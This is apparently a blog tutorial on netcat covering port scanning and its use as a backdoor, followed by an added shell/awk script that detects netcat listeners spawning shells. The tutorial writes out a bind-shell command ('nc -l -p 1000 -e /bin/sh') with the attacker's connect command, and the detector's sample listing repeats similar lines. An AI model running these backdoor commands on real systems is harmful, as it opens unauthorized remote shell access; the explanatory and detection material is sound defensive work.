How many times have you come across a blog/post that calls netcat a “swiss army knife”? Netcat is probably a swiss army knife, but on steroids. It is a must-have tool in your personal toolkit. If you haven’t had your first joy ride with netcat, read on, this post is for you.
Netcat allows you to read and write data across TCP and UDP sockets. That’s it, nothing else. In the simplicity of this utility, lies its very strength. Let us look at some of the very cool stuff that netcat is capable of:
Netcat is your port scanner: Yes, it can be a worthy port scanner and you can port scan a host using the following syntax:
nc -v -w2 -z scanme.org 20-40
-v makes the output verbose (add another v to increase the verbosity)
-w specifies the number of seconds netcat should wait for a connection (2 here) before it gives up on that attempt.
-z ensures that netcat does not send any data to the listening ports.
20-40 is the port range that netcat is going to scan through.
Netcat is a backdoor: OK, I don’t want to sound like the guys selling you a vegetable crusher on a home shopping channel and bragging about how it can crush carrots and cabbages at the same time. But netcat is even more versatile than that. It is often used as a backdoor by crackers. The following syntax (on the victim machine) will run an instance of netcat listening on port 1000:
nc -l -p 1000 -e /bin/sh
-l instructs the netcat binary to be in listen mode, waiting for inbound connections
-p specifies the port number i.e. 1000
-e specifies the program or a binary that it should run after successful connection i.e. a shell (/bin/sh)
The attacker can connect back to the victim machine, on the specified port, using another netcat instance on his machine:
nc -v victim_IP 1000
victim_IP is the IP of the machine where netcat was previously executed with the -l and -e options. Of course, the attacker first has to figure out a way to upload the netcat binary onto the victim’s machine.
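That listener pattern (netcat in listen mode plus -e) is also what a defender wants to spot on a host. As an added example that is not part of the original post, here is a small POSIX shell function that reads process-listing lines (the `ps -eo pid,args` layout is assumed) and prints the PIDs of nc/netcat/ncat processes that both listen and spawn a program; the sample listing is constructed.

```shell
#!/bin/sh
# Added example: flag netcat listeners that spawn a program (the post's
# "nc -l -p 1000 -e /bin/sh" pattern). Input format assumed: one process
# per line as printed by `ps -eo pid,args`, i.e. "<pid> <command> <args...>".

flag_nc_backdoors() {
    # Reads process lines on stdin, prints the PID of each suspicious one.
    awk '
    {
        cmd = $2
        sub(/.*\//, "", cmd)            # strip the path: /usr/bin/nc -> nc
        if (cmd != "nc" && cmd != "netcat" && cmd != "ncat") next
        listen = 0; spawn = 0
        for (i = 3; i <= NF; i++) {
            # -l on its own or bundled with other short flags (-lvp, -nlp)
            if ($i ~ /^-[a-zA-Z]*l[a-zA-Z]*$/) listen = 1
            # program-spawning flags: -e / -c (nc, netcat), --exec / --sh-exec (ncat)
            if ($i == "-e" || $i == "-c" || $i ~ /^--exec/ || $i ~ /^--sh-exec/) spawn = 1
        }
        if (listen && spawn) print $1
    }'
}

# Constructed sample listing: two backdoor-style listeners (412, 520),
# one port scan (413) and one plain listener without -e (521).
SAMPLE='    1 /sbin/init
  412 /usr/bin/nc -l -p 1000 -e /bin/sh
  413 nc -v -w2 -z scanme.org 20-40
  520 /usr/bin/ncat -lvp 4444 --exec /bin/bash
  521 nc -l -p 8080'

# Stand-alone run: prints 412 and 520, one per line.
printf '%s\n' "$SAMPLE" | flag_nc_backdoors
```

On a live host, feed it `ps -eo pid,args | flag_nc_backdoors`; a hit is worth a look, since a legitimate netcat listener rarely needs -e.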